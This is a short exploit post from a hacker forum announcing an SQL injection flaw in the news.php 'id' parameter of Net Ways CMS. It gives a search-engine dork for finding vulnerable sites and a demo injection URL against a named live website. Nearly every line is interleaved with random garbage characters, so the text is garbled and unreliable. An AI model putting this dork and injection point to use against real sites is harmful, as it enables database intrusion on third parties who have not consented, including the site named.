################################################################################??######## " ~+ m2 ~6 R, W
# ( r; A" i3 {- L* d/ X. a
# Exploit Title : Net Ways Cms Sql Injection Vulnerability * P+ b: n% I- T8 J3 p
# % f3 \. ] p. T
# Author : IrIsT.Ir + i+ \+ n$ i6 N. V3 z8 O8 t5 _$ j# j
#
& E# [) {$ f" J j6 g n7 u X# Discovered By : Am!r
" q5 y% |- N3 A% Q# 5 M- s G. F& \1 B2 i: m
# Home : http://IrIsT.Ir/forum
{. r) l& H. E( @' H) B# / _) e3 r% K1 @- c+ X
# Software Link : http://www.netways.com/ www.political-security.com
9 D7 F2 I6 ?8 V/ ^; a3 u+ `, ^# ; }- l: X3 e3 c" m
# Security Risk : High 7 u+ V& B3 R1 X. C8 g$ `+ ?
# . {% N- ]& _& A% b& o
# Version : All Version # H9 ~) z! Y! R# m
#
) G$ d; G( H- k" E7 j% e3 d# Tested on : GNU/Linux Ubuntu - Windows Server - win7 " g% `, {5 X3 O9 X8 c
# : a7 [: Z& {. \5 \
# Dork : intext:"Designed & developed by NetWays"
% E9 w/ ~& G! h, P( [4 R8 a; h' C( X#
5 c0 b' \' e+ e7 t; b& ^2 v- K9 v################################################################################??######## 3 g* i) b$ Z2 W/ Y! d4 @* C
#
2 j/ m: N9 F2 [# Expl0iTs :
) |4 ^5 p. B5 }0 {% L3 [; N# ! y9 M; h. ]' ~ `2 \' b) a
# http://target.com/news.php?id=[Sql]
: N; ~9 P9 C) N#
, f& |% A4 f7 k2 E9 F, H' u# 1 ^& Z% V0 ^( a
# D3mo :
o8 u, ~0 f& {4 a, j% \2 c6 {# 1 u! C& [2 }; J+ u; [, f
# http://compagnieparento.com/news.php?id=7[Sql] + g0 B' B6 T k
# $ }$ D1 T- O8 r- A" ?+ G& |$ L
################################################################################??######## 7 i1 T8 f8 }& f0 C% T8 p% T. p- i
# - G: z0 _0 ^0 a+ G* P# S
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r ! t% h/ A0 b& g3 w7 j# e
# 2 j0 i/ ~) O* B8 Z& t6 [4 |
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
0 j+ i/ }4 R; v/ ~& N8 {#
6 [# S( J3 w& {7 \# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum . T* X) @2 Y2 C2 M
#
2 G$ W# r" Q2 }2 r. p" N################################################################################??######## |